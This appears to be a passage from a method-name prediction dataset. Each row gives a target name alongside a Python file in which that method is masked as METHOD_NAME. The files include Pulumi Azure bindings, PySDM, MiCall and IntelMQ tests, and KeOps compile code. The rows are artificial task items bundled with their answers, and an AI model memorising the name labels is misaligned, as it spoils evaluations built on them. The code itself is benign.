num_torrents_to_send = min(PopularityCommunity.GOSSIP_RANDOM_TORRENT_COUNT, num_torrents)
random_torrents = random.sample(checked_and_alive, num_torrents_to_send)
return random_torrents | null |
type | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetDpsCertificateResult',
'AwaitableGetDpsCertificateResult',
'get_dps_certificate',
'get_dps_certificate_output',
]
@pulumi.output_type
class GetDpsCertificateResult:
"""
The X509 Certificate.
"""
def __init__(__self__, etag=None, id=None, name=None, properties=None, system_data=None, METHOD_NAME=None):
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", METHOD_NAME)
@property
@pulumi.getter
def etag(self) -> str:
"""
The entity tag.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
The resource identifier.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the certificate.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.CertificatePropertiesResponse':
"""
properties of a certificate
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
Metadata pertaining to creation and last modification of the resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def METHOD_NAME(self) -> str:
"""
The resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetDpsCertificateResult(GetDpsCertificateResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDpsCertificateResult(
etag=self.etag,
id=self.id,
name=self.name,
properties=self.properties,
system_data=self.system_data,
METHOD_NAME=self.METHOD_NAME)
def get_dps_certificate(certificate_name: Optional[str] = None,
provisioning_service_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDpsCertificateResult:
"""
Get the certificate from the provisioning service.
:param str certificate_name: Name of the certificate to retrieve.
:param str provisioning_service_name: Name of the provisioning service the certificate is associated with.
:param str resource_group_name: Resource group identifier.
"""
__args__ = dict()
__args__['certificateName'] = certificate_name
__args__['provisioningServiceName'] = provisioning_service_name
__args__['resourceGroupName'] = resource_group_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:devices/v20221212:getDpsCertificate', __args__, opts=opts, typ=GetDpsCertificateResult).value
return AwaitableGetDpsCertificateResult(
etag=pulumi.get(__ret__, 'etag'),
id=pulumi.get(__ret__, 'id'),
name=pulumi.get(__ret__, 'name'),
properties=pulumi.get(__ret__, 'properties'),
system_data=pulumi.get(__ret__, 'system_data'),
METHOD_NAME=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_dps_certificate)
def get_dps_certificate_output(certificate_name: Optional[pulumi.Input[str]] = None,
provisioning_service_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetDpsCertificateResult]:
"""
Get the certificate from the provisioning service.
:param str certificate_name: Name of the certificate to retrieve.
:param str provisioning_service_name: Name of the provisioning service the certificate is associated with.
:param str resource_group_name: Resource group identifier.
"""
... | null |
test ll82 pd2 | # pylint: disable=missing-module-docstring,missing-class-docstring,missing-function-docstring
import numpy as np
from PySDM import Formulae
from PySDM.physics.constants import si
class TestFragmentationFunctions: # pylint:disable=too-few-public-methods
@staticmethod
def test_straub_sigma1():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_sigma1(CW=30.0)
# assert
np.testing.assert_array_almost_equal(params, [0.467381])
@staticmethod
def test_straub_mu1():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_mu1(sigma1=0.467381)
# assert
np.testing.assert_array_almost_equal(params, [-7.933269])
@staticmethod
def test_straub_sigma2():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_sigma2(CW=30.0)
# assert
np.testing.assert_array_almost_equal(params, [0.000182])
@staticmethod
def test_straub_mu2():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_mu2(ds=0.0)
# assert
np.testing.assert_array_almost_equal(params, [0.00095])
@staticmethod
def test_straub_sigma3():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_sigma3(CW=30.0)
# assert
np.testing.assert_array_almost_equal(params, [0.000149])
@staticmethod
def test_straub_mu3():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_mu3(ds=0.18 * si.cm)
# assert
np.testing.assert_array_almost_equal(params, [0.00162])
@staticmethod
def test_ll82_pf1():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_f1(
dl=0.36 * si.cm, dcoal=0.3744 * si.cm
)
# assert
np.testing.assert_array_equal(
params, [105.78851401149461, 0.36, 0.003771383856549656]
)
@staticmethod
def test_ll82_pf2():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_f2(ds=0.18 * si.cm)
# assert
np.testing.assert_array_almost_equal(
params, (31.081892267202157, 0.18, 0.01283519925273017)
)
@staticmethod
def test_ll82_pf3():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_f3(
ds=0.0715 * si.cm, dl=0.18 * si.cm
)
# assert
np.testing.assert_array_almost_equal(
params, (11.078017412424996, -3.4579794266811095, 0.21024917628814235)
)
@staticmethod
def test_ll82_ps1():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_s1(
dl=0.36 * si.cm, ds=0.18 * si.cm, dcoal=0.3744 * si.cm
)
# assert
np.testing.assert_array_almost_equal(
params, (55.710586181217394, 0.36, 0.007344262785151853)
)
@staticmethod
def test_ll82_ps2():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_s2(
dl=0.36 * si.cm, ds=0.18 * si.cm, St=3.705e-6 * si.J
)
# assert
np.testing.assert_array_almost_equal(
params, (13.120297517162507, -2.0082590717125437, 0.24857168491193957)
)
@staticmethod
def test_ll82_pd1():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_d1(
W1=2.67, dl=0.36 * si.cm, dcoal=0.3744 * si.cm, CKE=8.55e-6 * si.J
)
# assert
np.testing.assert_array_almost_equal(
params, (24.080107809942664, 0.28666015630152986, 0.016567297254868083)
)
@staticmethod
def METHOD_NAME():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_d2(
ds=0.18 * si.cm, dl=0.36 * si.cm, CKE=8.55e-6 * si.J
)
# assert
np.testing.assert_array_almost_equal(params, [0.0, -4.967578, -4.967578]) | null |
test write contig refs two groups | from io import StringIO
from pathlib import Path
from Bio import SeqIO
from pytest import fixture, mark
from micall.core.denovo import write_contig_refs, denovo, DEFAULT_DATABASE, genotype
from micall.blast_db.make_blast_db import make_blast_db, DEFAULT_PROJECTS
@fixture(scope='session', name='hcv_db')
def check_hcv_db():
db_path = Path(DEFAULT_DATABASE)
index_path = db_path.parent / "refs.fasta.nin"
build_needed = not index_path.exists()
if not build_needed:
projects_date = Path(DEFAULT_PROJECTS).stat().st_mtime
index_date = index_path.stat().st_mtime
build_needed = index_date < projects_date
if build_needed:
with open(DEFAULT_PROJECTS) as projects_json, \
open(DEFAULT_DATABASE, 'w') as refs_fasta:
make_blast_db(projects_json, refs_fasta)
assert index_path.exists()
return db_path
def test_make_blast_db_excludes_hivgha(hcv_db):
fasta_path = Path(DEFAULT_DATABASE)
with fasta_path.open() as f:
for reference in SeqIO.parse(f, 'fasta'):
# Exclude the Ghana project, because they're recombinant.
assert reference.name != 'HIV1-CRF02_AG-GH-AB286855-seed'
def test_write_contig_refs_two_sequences(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,1.0,HCV-1a,CAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def METHOD_NAME(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
ACCCGCCCCTAATAGGGGCGACACTCCGCCATGAATC
>bar
ACCATGGATCACTCCCCTGTGAGGAACTACTGTCTT
>baz
TGCAATGACAGCTTACAGACGGGTTTCCTCGCTTCCTTGTTTTACACCCA
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-2a,1.0,HCV-2b,ACCCGCCCCTAATAGGGGCGACACTCCGCCATGAATC
HCV-1g,1.0,HCV-1g,ACCATGGATCACTCCCCTGTGAGGAACTACTGTCTT
HCV-2b,1.0,HCV-2b,TGCAATGACAGCTTACAGACGGGTTTCCTCGCTTCCTTGTTTTACACCCA
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_write_contig_refs_not_found(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
CATCACATAGGAGA
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
unknown,0,,CATCACATAGGAGA
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_write_contig_refs_partial_match(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,0.75,HCV-1a,CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_write_contig_refs_reversed_match(tmpdir, hcv_db):
""" If BLAST match is reversed, then reverse the contig before reporting. """
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
GTCGTCGCCACACACGAGCATGGTGCAGTCCTGGAGCCCTGTCTCCTATGTGATG
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,0.75,HCV-1a,CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_genotype(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
blast_csv = StringIO()
expected_blast_csv = """\
contig_num,ref_name,score,match,pident,start,end,ref_start,ref_end
2,HCV-1g,37,0.67,100,19,55,8506,8542
2,HCV-1a,41,0.75,100,15,55,8518,8558
1,HCV-1a,41,1.0,100,1,41,8187,8227
"""
genotype(str(contigs_fasta), blast_csv=blast_csv)
assert expected_blast_csv == blast_csv.getvalue()
def test_write_contig_refs(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,0.75,HCV-1a,CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
blast_csv = StringIO()
expected_blast_csv = """\
contig_num,ref_name,score,match,pident,start,end,ref_start,ref_end
2,HCV-1g,37,0.67,100,19,55,8506,8542
2,HCV-1a,41,0.75,100,15,55,8518,8558
1,HCV-1a,41,1.0,100,1,41,8187,8227
"""
write_contig_refs(str(contigs_fasta), contigs_csv, blast_csv=blast_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
assert expected_blast_csv == blast_csv.getvalue()
def test_write_contig_refs_none(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / 'contigs.fasta'
assert not contigs_fasta.exists()
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_merged_contig(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / 'contigs.fasta'
assert not contigs_fasta.exists()
merged_contigs_path = Path(tmpdir) / 'merged_contigs.csv'
merged_contigs_path.write_text("""\
contig
TGCACAAGACCCAACAACAATACAAGAAAAAGTATAAGGATAGGACCAGGA
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HIV1-C-BR-JX140663-seed,1.0,HIV1-C-BR-JX140663-seed,TGCACAAGACCCAACAACAATACAAGAAAAAGTATAAGGATAGGACCAGGA
"""
with merged_contigs_path.open() as merged_contigs_csv:
write_contig_refs(str(contigs_fasta),
contigs_csv,
merged_contigs_csv=merged_contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
@mark.iva() # skip with -k-iva
def test_denovo_iva(tmpdir, hcv_db):
microtest_path = Path(__file__).parent / 'microtest'
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-2a,1.0,HCV-2a,TGAGGGCCAAAAAGGTAACTTTTGATAGGATGCAAGTGC\
TCGACGCTCATTACGACTCAGTCTTAAAGGACATCAAGCTAGCGGCCTCCAAGGTCTCCG\
CGAGGCTCCTCACCCTGGAGGAGGCATGCCAGCTAACTCCACCCCATTCTGCAAGATCCAAATATGGGTTTGGGGCTA\
AGGAGGTGCGCAGCTTGTCCGGGAGGGCCGTTAACCACATCAAGTCCGTGTGGAAGGACCTCCTGGAAGACTCACAAA\
CACCAATTCCCACAACCATCATGGCCAAAAATGAAGTGTTCTGCGTGGACCCCACCAAGGGGGGTAAGAAAGCAGCTC\
GCCTCATCGTTTACCCTGACCTCGGCGTCAGGGTCTGCGAGAAGATGGCCCTTTATGATGTCACACAAAAGCTTCCTC\
AGGCGGTGATGGGGGCTTCTTATGGATTCCAGTACTCCC
"""
denovo(str(microtest_path / '2160A-HCV_S19_L001_R1_001.fastq'),
str(microtest_path / '2160A-HCV_S19_L001_R2_001.fastq'),
contigs_csv,
tmpdir)
assert contigs_csv.getvalue() == expected_contigs_csv | null |
process | # SPDX-FileCopyrightText: 2023 by Bundesamt für Sicherheit in der Informationstechnik (BSI)
#
# SPDX-License-Identifier: AGPL-3.0-or-later
# -*- coding: utf-8 -*-
"""
Copyright (c) 2023 by Bundesamt für Sicherheit in der Informationstechnik (BSI)
Software engineering by BSI & Intevation GmbH
This file tests IntelMQ bots in library mode (IEP007)
"""
import json
import unittest
from os.path import dirname, join
from pytest import raises
import intelmq.tests.bots.experts.domain_suffix.test_expert as domain_suffix_expert_test
from intelmq.bots.experts.domain_suffix.expert import DomainSuffixExpertBot
from intelmq.bots.experts.taxonomy.expert import TaxonomyExpertBot
from intelmq.bots.experts.url.expert import URLExpertBot
from intelmq.lib.bot import BotLibSettings, Dict39, ExpertBot
from intelmq.lib.message import Message, MessageFactory
from intelmq.tests.lib import test_parser_bot
EXAMPLE_DATA_URL = Dict39({'source.url': 'http://example.com/'})
EXAMPLE_DATA_URL_OUT = EXAMPLE_DATA_URL | {'source.fqdn': 'example.com',
'source.port': 80,
'source.urlpath': '/',
'protocol.application': 'http',
'protocol.transport': 'tcp'}
EXAMPLE_IP_INPUT = {"source.ip": "192.0.43.7", # icann.org.
"destination.ip": "192.0.43.8", # iana.org.
"time.observation": "2015-01-01T00:00:00+00:00",
}
class BrokenInitExpertBot(ExpertBot):
def init(self):
raise ValueError('This initialization intionally raises an error!')
class RaisesOnFirstRunExpertBot(ExpertBot):
counter = 0
def init(self):
self.counter = 0
def METHOD_NAME(self):
event = self.receive_message()
self.counter += 1
if self.counter == 1:
raise ValueError('This initialization intionally raises an error!')
self.send_message(event)
self.acknowledge_message()
def assertMessageEqual(actual, expected):
"""
Compare two messages as dicts.
"""
if isinstance(actual, Message):
actual = actual.to_dict(with_type=True)
else:
actual = actual.copy()
if isinstance(expected, Message):
expected = expected.to_dict(with_type=True)
else:
expected = expected.copy()
if 'time.observation' in actual:
del actual['time.observation']
if 'time.observation' in expected:
del expected['time.observation']
if 'output' in actual:
actual['output'] = json.loads(actual['output'])
if 'output' in expected:
expected['output'] = json.loads(expected['output'])
assert actual == expected
def test_dummy_parser_bot():
bot = test_parser_bot.DummyParserBot('dummy-bot', settings=BotLibSettings)
sent_messages = bot.process_message(test_parser_bot.EXAMPLE_REPORT.copy())
assertMessageEqual(sent_messages['output'][0], test_parser_bot.EXAMPLE_EVENT)
assertMessageEqual(sent_messages['error'][0], MessageFactory.from_dict(test_parser_bot.EXPECTED_DUMP[0].copy(), default_type='Report'))
assertMessageEqual(sent_messages['error'][1], MessageFactory.from_dict(test_parser_bot.EXPECTED_DUMP[1].copy(), default_type='Report'))
def test_domain_suffix():
domain_suffix = DomainSuffixExpertBot('domain-suffix',
settings=BotLibSettings | {'field': 'fqdn',
'suffix_file': join(dirname(domain_suffix_expert_test.__file__), 'public_suffix_list.dat')})
queues = domain_suffix.process_message({'source.fqdn': 'www.example.com'})
assert queues['output'][0]['source.domain_suffix'] == 'example.com'
def test_url_expert():
url_expert = URLExpertBot('url', settings=BotLibSettings)
queues = url_expert.process_message(EXAMPLE_DATA_URL.copy())
del url_expert
assert queues['output'] == [EXAMPLE_DATA_URL_OUT]
def test_url_and_taxonomy():
url_expert = URLExpertBot('url', settings=BotLibSettings)
queues_url = url_expert.process_message(EXAMPLE_DATA_URL.copy())
del url_expert
message = queues_url['output'][0]
taxonomy_expert = TaxonomyExpertBot('taxonomy', settings=BotLibSettings)
queues = taxonomy_expert.process_message(message)
assert queues['output'] == [Dict39(EXAMPLE_DATA_URL_OUT) | {'classification.taxonomy': 'other', 'classification.type': 'undetermined'}]
def test_bot_exception_init():
"""
When a bot raises an exception during Bot initialization
"""
with raises(ValueError):
BrokenInitExpertBot('broken', settings=BotLibSettings)
def test_bot_multi_message():
url_expert = URLExpertBot('url', settings=BotLibSettings)
queues = url_expert.process_message(EXAMPLE_DATA_URL.copy(), EXAMPLE_DATA_URL.copy())
del url_expert
assert queues['output'] == [EXAMPLE_DATA_URL_OUT] * 2
def test_bot_raises_and_second_message():
"""
The first message raises an error and the second message
This test is based on an issue where the exception-raising message was not cleared from the internal message store of the Bot/Pipeline instance and thus re-used on the second run
"""
raises_on_first_run = RaisesOnFirstRunExpertBot('raises', settings=BotLibSettings)
with raises(ValueError):
raises_on_first_run.process_message(EXAMPLE_DATA_URL)
queues = raises_on_first_run.process_message(EXAMPLE_IP_INPUT)
assert len(queues['output']) == 1
assertMessageEqual(queues['output'][0], EXAMPLE_IP_INPUT)
if __name__ == '__main__': # pragma: no cover
unittest.main() | null |
write code | import os
import keopscore.config.config
from keopscore.config.config import get_build_folder
from keopscore.utils.code_gen_utils import get_hash_name
from keopscore.utils.misc_utils import KeOps_Error, KeOps_Message
from keopscore.config.config import cpp_flags
class LinkCompile:
"""
Base class for compiling the map_reduce schemes and providing the dll to KeOps bindings.
"""
def __init__(self):
# N.B. Here self is assumed to be populated by the __init__ of one of the MapReduce classes
# we create the hash string id corresponding to all parameters, e.g. 7b9a611f7e
self.gencode_filename = get_hash_name(
type(self),
self.red_formula_string,
self.aliases,
self.nargs,
self.dtype,
self.dtypeacc,
self.sum_scheme_string,
self.tagHostDevice,
self.tagCpuGpu,
self.tag1D2D,
self.use_half,
self.device_id,
cpp_flags,
)
# info_file is the name of the file that will contain some meta-information required by the bindings, e.g. 7b9a611f7e.nfo
self.info_file = os.path.join(
get_build_folder(), self.gencode_filename + ".nfo"
)
# gencode_file is the name of the source file to be created and then compiled, e.g. 7b9a611f7e.cpp or 7b9a611f7e.cu
self.gencode_file = os.path.join(
get_build_folder(),
self.gencode_filename + "." + self.source_code_extension,
)
def save_info(self):
# create info_file to save some parameters : dim (dimension of output vectors),
# tagI (O or 1, reduction over i or j indices),
# dimy (sum of dimensions of j-indexed vectors)
f = open(self.info_file, "w")
f.write(
f"red_formula={self.red_formula_string}\ndim={self.dim}\ntagI={self.tagI}\ndimy={self.dimy}"
)
f.close()
def read_info(self):
# read info_file to retreive dim, tagI, dimy
f = open(self.info_file, "r")
string = f.read()
f.close()
tmp = string.split("\n")
if len(tmp) != 4:
KeOps_Error("Incorrect info file")
tmp_dim, tmp_tag, tmp_dimy = (
tmp[1].split("="),
tmp[2].split("="),
tmp[3].split("="),
)
if (
len(tmp_dim) != 2
or tmp_dim[0] != "dim"
or len(tmp_tag) != 2
or tmp_tag[0] != "tagI"
or len(tmp_dimy) != 2
or tmp_dimy[0] != "dimy"
):
KeOps_Error("Incorrect info file")
self.dim = eval(tmp_dim[1])
self.tagI = eval(tmp_tag[1])
self.dimy = eval(tmp_dimy[1])
def METHOD_NAME(self):
# write the generated code in the source file ; this is used as a subfunction of compile_code
f = open(self.gencode_file, "w")
f.write(self.code)
f.close()
def generate_code(self):
pass
def get_dll_and_params(self):
# main method of the class : it generates - if needed - the code and returns the name of the dll to be run for
# performing the reduction, e.g. 7b9a611f7e.so, or in the case of JIT compilation, the name of the main KeOps dll,
# and the name of the assembly code file.
if not os.path.exists(self.file_to_check):
KeOps_Message(
"Generating code for formula " + self.red_formula.__str__() + " ... ",
flush=True,
end="",
)
self.generate_code()
self.save_info()
KeOps_Message("OK", use_tag=False, flush=True)
else:
self.read_info()
return dict(
tag=self.gencode_filename,
source_file=self.true_dllname,
low_level_code_file=self.low_level_code_file,
tagI=self.tagI,
use_half=self.use_half,
tag1D2D=self.tag1D2D,
dimred=self.red_formula.dimred,
dim=self.dim,
dimy=self.dimy,
indsi=self.varloader.indsi,
indsj=self.varloader.indsj,
indsp=self.varloader.indsp,
dimsx=self.varloader.dimsx,
dimsy=self.varloader.dimsy,
dimsp=self.varloader.dimsp,
) | null |
Subsets and Splits